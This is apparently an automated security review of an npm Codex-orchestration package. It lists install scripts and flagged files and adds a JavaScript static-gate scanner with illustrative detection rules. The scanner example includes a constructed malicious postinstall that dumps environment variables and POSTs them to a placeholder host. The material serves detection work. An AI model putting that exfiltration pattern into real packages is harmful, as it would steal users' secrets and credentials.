AI Security Review
scanned 3d ago · by lpm-firewall-ai
Source inspection established no confirmed malicious attack surface. The package has broad Codex orchestration capabilities, but its risky file writes, shell commands, and network calls are user-invoked or aligned with the package's stated purpose rather than hidden install-time or import-time behavior.
Decision evidence
public snapshot
- package.json defines postinstall and prepare lifecycle scripts.
- dist/scripts/postinstall.js runs on global npm installs and writes $CODEX_HOME/.omx/install-state.json.
- dist/cli/setup.js can write Codex config, hooks, skills, prompts, native agents, and AGENTS.md when user runs omx setup.
- dist/autoresearch/runtime.js runs git and a user-supplied evaluator command with shell:true during autoresearch workflows; with shell:true the evaluator string is interpreted by the shell, so whoever controls that string controls the command line.
- dist/mcp/code-intel-server.js invokes npx/grep/ast-grep for user-requested code intelligence tools.
- dist/notifications/notifier.js can POST to user-configured Discord webhooks or Telegram API for notifications.
- Postinstall is gated to global installs and only records an install/version stamp plus a setup reminder; no network or command execution found there.
- Main import dist/index.js only re-exports library APIs and has no import-time side effects beyond module loading.
- The CLI entrypoint dispatches user-invoked omx commands; the setup, config, and AGENTS.md mutations are aligned with the package purpose and are exposed in the help text.
- Network endpoints found are npm registry update checks, user-configured notification endpoints, GitHub release tooling, or live smoke tests requiring explicit env/script invocation.
- No evidence of credential harvesting, hidden exfiltration, persistence outside OMX/Codex-managed files, or lifecycle-time mutation of the AI-agent control surface (hooks, skills, prompts, AGENTS.md) without user consent.
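The evidence list above is in effect a static-gate procedure: enumerate install-time lifecycle scripts, resolve which files they run, check those files for command execution, network calls and dynamic loading, and treat the same patterns in user-invoked code paths as lower severity. The following is an added example of such a gate in JavaScript; it is not lpm-firewall-ai's scanner and not code from the reviewed package. The package.json and source files it scans are constructed inline (the names example-cli and example.invalid are hypothetical) so it runs offline, and the regex rules are illustrative rather than the scanner's actual rule set.

```javascript
// Added example: a minimal static install-time gate. Not lpm-firewall-ai's
// scanner and not the reviewed package's code; every input below is constructed.

const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Illustrative pattern rules (a production scanner would walk the AST instead).
const RULES = [
  { id: "child_process", re: /require\(["'](node:)?child_process["']\)|from\s+["'](node:)?child_process["']/ },
  { id: "shell_true", re: /shell\s*:\s*true/ },
  { id: "dynamic_import", re: /\bimport\(|require\(\s*[^"'\s)]/ },
  { id: "network", re: /\bfetch\(|https?\.(request|get)\(/ },
  { id: "shell_profile_write", re: /\.(bashrc|zshrc|profile)\b/ },
  { id: "package_manager_exec", re: /\b(npx|npm install|pnpm add)\b/ },
  { id: "fs_write", re: /\bwriteFile(Sync)?\(/ },
  { id: "global_gate", re: /npm_config_global/ }, // install script gated to global installs
];
// Rules that block when they fire in code an install-time script reaches.
const BLOCK_RULES = new Set([
  "child_process", "shell_true", "dynamic_import", "network",
  "shell_profile_write", "package_manager_exec",
]);

// Follow "node <file>" and "npm run <script>" in a script command to the files it runs.
function resolveScriptFiles(scripts, name, seen = new Set()) {
  if (seen.has(name) || !scripts[name]) return [];
  seen.add(name);
  const cmd = scripts[name];
  const files = [...cmd.matchAll(/\bnode\s+([^\s&|;]+\.[cm]?js)\b/g)].map((m) => m[1]);
  for (const m of cmd.matchAll(/\bnpm\s+run\s+([^\s&|;]+)/g)) {
    files.push(...resolveScriptFiles(scripts, m[1], seen));
  }
  return files;
}

// files: { "relative/path": "contents" }, including package.json.
function reviewPackage(files) {
  const scripts = JSON.parse(files["package.json"]).scripts || {};
  const findings = [];
  const installFiles = new Set();
  for (const hook of INSTALL_HOOKS.filter((h) => scripts[h])) {
    findings.push({ file: "package.json", rule: "lifecycle_script", stage: "install", detail: `${hook}: ${scripts[hook]}` });
    for (const f of resolveScriptFiles(scripts, hook)) installFiles.add(f);
  }
  for (const [file, text] of Object.entries(files)) {
    if (file === "package.json") continue;
    // "runtime" means the code only runs when a user invokes a command.
    const stage = installFiles.has(file) ? "install" : "runtime";
    for (const rule of RULES) {
      if (rule.re.test(text)) findings.push({ file, rule: rule.id, stage });
    }
  }
  const blocking = findings.filter((f) => f.stage === "install" && BLOCK_RULES.has(f.rule));
  const verdict = blocking.length ? "block" : findings.length ? "review" : "pass";
  return { verdict, findings, blocking, installFiles: [...installFiles] };
}

// Constructed sample package shaped like the review's description: a gated
// postinstall that only stamps a state file, plus user-invoked shell and webhook code.
const SAMPLE_PACKAGE = {
  "package.json": JSON.stringify({
    name: "example-cli",
    scripts: { postinstall: "node dist/scripts/postinstall.js", prepare: "npm run build", build: "tsc -p ." },
  }),
  "dist/scripts/postinstall.js": [
    'const fs = require("fs");',
    'const path = require("path");',
    'if (process.env.npm_config_global !== "true") process.exit(0);',
    'const dir = path.join(process.env.HOME || "", ".example");',
    "fs.mkdirSync(dir, { recursive: true });",
    'fs.writeFileSync(path.join(dir, "install-state.json"), JSON.stringify({ v: 1 }));',
  ].join("\n"),
  "dist/autoresearch/runtime.js": [
    'const { spawn } = require("child_process");',
    'module.exports = (cmd) => spawn(cmd, { shell: true, stdio: "inherit" });',
  ].join("\n"),
  "dist/notifications/notifier.js": 'module.exports = (url, body) => fetch(url, { method: "POST", body });',
};

// Constructed counter-example: the same package with a postinstall that execs and phones home.
const MALICIOUS_POSTINSTALL = [
  'const { execSync } = require("child_process");',
  'const env = execSync("env").toString();',
  'fetch("https://example.invalid/collect", { method: "POST", body: env });',
].join("\n");

console.log("sample:", reviewPackage(SAMPLE_PACKAGE).verdict);
console.log("malicious:", reviewPackage({ ...SAMPLE_PACKAGE, "dist/scripts/postinstall.js": MALICIOUS_POSTINSTALL }).verdict);
```

The sample package comes out as "review": its lifecycle scripts exist and must be read, but the only file postinstall reaches does nothing beyond a gated filesystem write, while the child_process, shell:true and fetch hits sit in files no install hook resolves to. Swapping in the phoning-home postinstall flips the verdict to "block" on the child_process and network hits in the install stage, which is the distinction the decision evidence above is drawing.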
Source & flagged code
9 flagged (eight listed below)
- Install-time lifecycle script matches a deterministic static-gate block pattern: package.json
- Package defines install-time lifecycle scripts: package.json
- Package source references child process execution: dist/autoresearch/runtime.js (line 1)
- Package source references dynamic require/import behavior: dist/cli/hooks.js (line 40)
- This package version adds a dangerous source file absent from the previous stored version: dist/cli/index.js
- Source writes installer persistence such as shell profile or service configuration: dist/cli/index.js (line 4)
- Package source invokes a package manager install command at runtime: dist/mcp/code-intel-server.js (line 546)
- Package ships non-JavaScript build or shell helper files: src/scripts/run-autoresearch-showcase.sh